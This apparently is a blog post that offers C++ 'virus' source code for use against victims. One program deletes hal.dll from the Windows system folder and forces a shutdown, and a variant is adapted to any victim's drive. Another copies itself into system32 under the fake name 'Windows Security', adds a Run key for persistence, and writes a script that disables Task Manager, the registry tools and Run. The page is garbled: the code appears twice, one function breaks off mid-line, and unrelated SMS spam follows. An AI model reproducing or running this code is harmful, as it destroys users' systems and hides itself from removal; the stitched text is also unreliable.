#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
Second C++ Virus
#include
#include
#include
#include
#include
char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance, LPSTR lpCmdLine, int
nCmdShow)
{
HKEY hKey2;
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
strcat(windir, "\\system32\\Wsecurity.exe");
CopyFile(pathname,windir,0);
unsigned char omg[45] =
"C:\\Windows\\System32\\Wsecurity.exe";
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,"Software\\Microsoft\\
Windows\\CurrentVersion\\Run",0,KEY_SET_VALU
E,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2, "Windows
Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
else
{
RegOpenKeyEx(
HKEY_CURRENT_USER,"Software\\Microsoft\\Wi
ndows\\CurrentVersion\\Run",0,KEY_SET_VALUE,
&hKey2 );
RegSetValueEx(hKey2, "Windows
Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
return 0;
}
void restrictcleanwin()
{
ofstream Disable;
Disable.open("C:\\WINDOWS\\WinDisable.vbs",ios::o
ut);
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\
", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\System\\Disable
RegistryTools\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\System\\DisableT
askMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\
\Windows\\CurrentVersion\\Policies\\System\\Disable
TaskMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
Second C++ Virus
#include
#include
#include
#include
#include
char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance, LPSTR lpCmdLine, int
nCmdShow)
{
HKEY hKey2;
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
strcat(windir, "\\system32\\Wsecurity.exe");
CopyFile(pathname,windir,0);
unsigned char omg[45] =
"C:\\Windows\\System32\\Wsecurity.exe";
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,"Software\\Microsoft\\
Windows\\CurrentVersion\\Run",0,KEY_SET_VALU
E,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2, "Windows
Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
else
{
RegOpenKeyEx(
HKEY_CURRENT_USER,"Software\\Microsoft\\Wi
ndows\\CurrentVersion\\Run",0,KEY_SET_VALUE,
&hKey2 );
RegSetValueEx(hKey2, "Windows
Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
return 0;
}
void restrictcleanwin()
{
ofstream Disable;
Disable.open("C:\\WINDOWS\\WinDisable.vbs",ios::o
ut);
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\
", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\System\\Disable
RegistryTools\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_CURRENT_USER\\Software\\Microsoft\\
Windows\\CurrentVersion\\Policies\\System\\DisableT
askMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\
\Windows\\CurrentVersion\\Policies\\System\\Disable
TaskMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
sEnD uNliMiteD
sMs aNywhEre iN iNdiA vTh ur own number.For using ds,u jUsT
hAv an aCcOuNt iN smsze.com.
No comments:
Post a Comment